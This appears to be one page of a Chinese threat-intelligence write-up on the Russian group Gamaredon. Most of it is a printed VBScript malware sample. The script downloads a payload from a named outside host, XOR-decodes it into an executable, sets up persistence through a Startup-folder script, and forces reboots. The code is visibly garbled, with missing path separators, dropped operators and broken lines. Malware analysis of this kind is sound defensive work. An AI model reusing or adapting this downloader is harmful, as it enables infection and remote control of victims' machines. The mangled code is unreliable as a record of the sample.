俄罗斯组织Gamaredon近期活动分析
来源:岁月联盟
时间:2020-01-29
If HHHm.FileExists( FCkE ) Then
Set NgjR = HHHm.GetFile( FCkE )
Set vHqt = NgjR.OpenAsTextStream( ForReading, TriStateFalse )
Else
vHqt.Close
Set vHqt = Nothing
Set NgjR = Nothing
Set HHHm = Nothing
Exit Function
End If
If HHHm.FileExists( BGmO ) Then
vHqt.Close
Set vHqt = Nothing
Set NgjR = Nothing
If HHHm.Fileexists( FCkE) Then HHHm.DeleteFile FCkE
Set HHHm = Nothing
Exit Function
Else
Set jIFy = HHHm.CreateTextFile( BGmO, True, False )
End If
set joCE = 0
Do Until vHqt.AtEndOfStream
For joCE = 0 To UBound( msKq )
joCE + 1 mod ( UBound( msKq ))
jIFy.Write Chr( Asc( vHqt.Read( 1 ) ) Xor msKq(joCE) )
if vHqt.AtEndOfStream Then Exit Do
Next
Loop
set joCE = 0
Do Until vHqt.AtEndOfStream
joCE = ( joCE + 1 ) ( UBound( msKq ) + 1 )
jIFy.Write Chr( Asc( vHqt.Read( 1 ) ) Xor msKq(mzrI) )
joCE=joCE+1
If mzrIThen
mzrI=mzrI+1
else mzrI=0
End If
Loop
jIFy.Close
If HHHm.Fileexists(FCkE) Then HHHm.DeleteFile FCkE
vHqt.Close
Set vHqt = Nothing
Set NgjR = Nothing
Set jIFy = Nothing
Set HHHm = Nothing
On Error Goto 0
End Function
Function GetHKcc( KCel )
Dim joCE, msKq( )
ReDim msKq( Len( KCel ) - 1 )
For joCE = 0 To UBound( msKq )
msKq(joCE) = Asc( Mid( KCel, joCE + 1, 1 ) )
Next
GetHKcc = msKq
End Function
Function pdBR(ByVal QopZ)
Dim qsGf
Const EhpF = “abcdefghijklmnopqrstuvwxyz0123456789”
Randomize
For joCE = 1 To QopZ
qsGf = qsGf & Mid(EhpF, Int(36 * Rnd + 1), 1)
Next
pdBR = qsGf
End Function
Sub save(data)
Dim vNsF
vNsF = “1”
vNsF = pdBR(5)
Set CQLk = CreateObject(“Scripting.FileSystemObject”)
Set jSmA = CreateObject(“ADODB.Stream”)
On Error Resume Next
jSmA.Open
jSmA.Type = 1
jSmA.Write (data)
jSmA.Position = 0
Set CQLk = Nothing
jSmA.SaveToFile “C:UsersShytAppDataRoamingMicrosoftExcel”+ vNsF +”.txt”
jSmA.Close
WScript.Sleep 7273
Set PaKX = CreateObject(“Scripting.FileSystemObject”)
Set lCPt = PaKX.GetFile(“C:UsersShytAppDataRoamingMicrosoftExcel”+ vNsF +”.txt”)
If lCPt.Size 1025 Then lCPt.Delete
Dim arrHKcc, kcEE
arrHKcc = GetHKcc( “9AC9AA87”)
kcEE = Encode( “C:UsersShytAppDataRoamingMicrosoftExcel”+ vNsF +”.txt”, “C:UsersShytAppDataRoamingMicrosoftExcel”+vNsF+”.exe”, arrHKcc )
WScript.Sleep 6425
If PaKX.FileExists( “C:UsersShytAppDataRoamingMicrosoftExcel”+ vNsF +”.txt” ) Then PaKX.DeleteFile “C:UsersShytAppDataRoamingMicrosoftExcel”+ vNsF +”.txt”
If PaKX.FileExists( “C:UsersShytAppDataRoamingMicrosoftExcel”+vNsF+”.exe” ) Then
Set DeCQ = PaKX.CreateTextFile(“C:UsersShytAppDataRoamingMicrosoftWindowsStart MenuProgramsStartup”+ vNsF +”.vbs”, True, True)
DeCQ.Write “On Error Resume Next” & vbCrLf
DeCQ.Write “Set PaKX = CreateObject(“”Scripting.FileSystemObject””)”& vbCrLf
DeCQ.Write “createobject(“”Wscript.Shell””).run “”C:UsersShytAppDataRoamingMicrosoftExcel”+vNsF+”.exe””,0” & vbCrLf
DeCQ.Write “PaKX.DeleteFile Wscript.ScriptFullName”& vbCrLf
DeCQ.Close
End If
If kcEE 0 Then
End If
End Sub
hutC = 1
Do While hutC > 0
WScript.Sleep 181224
save CZeq(“http://skrembler.hopto.org/WIN-IHN30SD7IMB_9AC9AA87/tor.php“)
Dim QKLN, zIvq, jJjj, CQLk
Set YDJG = CreateObject(“Scripting.FileSystemObject”)
QKLN = YDJG.GetParentFolderName(“C:UsersShytAppDataRoamingMicrosoftExcel”+vNsF+”.exe”)
With WScript.CreateObject(“Scripting.FileSystemObject”)
Set HHHm = CreateObject(“Scripting.FileSystemObject”)
If HHHm.Fileexists(“C:UsersShytAppDataRoamingMicrosoftExcel”+ vNsF +”.txt”) Then HHHm.DeleteFile “C:UsersShytAppDataRoamingMicrosoftExcel”+ vNsF +”.txt”
jJjj = 0
For Each zIvq In .GetFolder(QKLN).Files
If UCase(.GetExtensionName(zIvq.Name)) = UCase(“exe”) Then
jJjj = jJjj + 1
End If
Next
If (jJjj > 2) Then
Dim NYBz, IHEL, IHELSheck
Set NYBz = GetObject(“WinMgmts:{(Shutdown,RemoteShutdown)}!.RootCIMV2:Win32OperatingSystem”)
Set IHEL = NYBz.Instances
For Each IHELSheck In IHEL
IHELSheck.Reboot()
Next
End If
End With
Loop
程序最开始通过
On Error Resume NextDim MTYjMTYj = DateAdd("s", 25, Now())Do Until (Now() > MTYj)Loop
上一页 [1] [2] [3] 下一页
